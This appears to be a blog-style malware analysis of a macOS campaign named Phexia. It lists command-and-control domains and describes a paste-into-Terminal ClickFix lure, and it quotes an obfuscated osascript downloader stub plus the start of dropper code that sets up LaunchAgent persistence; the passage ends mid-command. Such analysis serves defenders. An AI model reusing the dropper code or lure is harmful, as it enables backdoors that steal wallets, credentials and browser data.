Malware Insights: macOS Phexia Campaign A new macOS malware campaign dubbed Phexia uses compromised websites to trick users into pasting and executing malicious commands in Terminal, deploying a persistent backdoor that targets crypto wallets, browsers, and Telegram data. The attack chain involves a Clickfix payload, a LaunchAgent persistence mechanism, and a control server connection loop that fetches new domains via a Telegram bot. The campaign is linked to APT28, though unconfirmed by third parties. Malware Insights : MacOS Phexia Campaign I got nerdsniped today. Some compromised website wanted me to execute a command in the Terminal.app because I've set my User-Agent to a randomized profile and it was a MacOS Browser. Overview - CNC domains : x2db.cx , a5db.ch , a6b6.biz , kfcnevkusno.one - CNC bots : t.me/neverfakebot - CNC networks : Cloudflare - Target OS : MacOS - Target Apps : All crypto wallets, All Browsers, Password extensions, Keychains, Browser Cookies, Browser History, Telegram Auth Data - Botnet Operator : Unconfirmed by third-parties APT28 Stage 1 : Clickfix Attack A compromised website asks you to execute a Clickfix payload via Cmd + C and Cmd + V right into the Terminal.app , having copied the downloader's script command already into your clipboard. The initial payload for the downloader was obfuscated with base64 encoding and does a curl request to download and execute an osascript file which caught my curiosity. osascript -e "$ echo "... base64encoded ..." | base64 -d " Dropper Source Code do shell script " SCRIPT PATH=\"$HOME/Library/pwvrskwjcwvtcrjr\"; mkdir -p \"$HOME/Library/LaunchAgents\"; cat \"$HOME/Library/LaunchAgents/com.components.pwvrskwjcwvtcrjr.plist\" <